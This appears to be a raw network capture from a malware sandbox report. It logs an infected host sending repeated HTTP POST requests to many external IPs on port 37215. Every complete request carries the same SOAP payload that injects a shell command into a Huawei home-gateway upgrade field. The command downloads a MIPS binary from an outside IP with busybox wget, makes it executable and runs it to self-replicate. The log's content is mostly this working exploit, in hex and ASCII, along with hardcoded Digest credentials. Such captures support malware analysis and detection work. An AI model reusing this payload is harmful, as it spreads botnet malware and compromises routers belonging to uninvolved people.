20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2115192.168.2.1333582157.61.48.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.717717886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2116192.168.2.1336756157.32.190.3637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.717768908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2117192.168.2.1360760197.64.37.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.717797995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2118192.168.2.1342130197.123.88.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.717973948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2119192.168.2.1335198197.55.95.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.717988968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2120192.168.2.135416689.96.85.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.717988968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2121192.168.2.135052041.34.80.3537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.721029043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2122192.168.2.135297845.218.126.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.721046925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2123192.168.2.135331014.67.82.1737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.721088886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2124192.168.2.1341500157.99.166.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.721101999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2125192.168.2.135009441.246.137.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.721263885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
